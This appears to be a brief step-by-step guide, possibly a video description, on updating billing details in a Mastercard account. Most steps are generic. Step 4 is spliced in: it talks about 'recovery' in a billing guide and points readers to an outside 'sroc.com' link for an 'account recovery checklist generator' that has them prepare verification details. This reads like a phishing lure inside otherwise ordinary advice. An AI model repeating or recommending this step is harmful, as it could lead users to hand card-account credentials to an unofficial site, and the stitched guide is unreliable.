I hit this issue today, and here's the quick fix that solved it. Updating your billing information on your Mastercard is straightforward if you follow these steps. Step 1. Log into your account. Visit the official Mastercard website and log into your account using your credentials. This is where you can manage all your account settings. Step 2. Navigate to billing information. Once logged in, look for the billing information or payment methods section in your account dashboard. This is where you can view and edit your current billing details. Step 3. Edit your information. Click on the option to edit your billing information. Here, you can update your address, phone number, or any other relevant details. Make sure to double check for typos. Step 4. Verify your changes. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Check for confirmation. Once verified, check your account again to ensure that the updated information is displayed correctly. This step is crucial to avoid any issues with future transactions. If you follow these steps, you should have no trouble keeping your billing information up to date. Happy managing!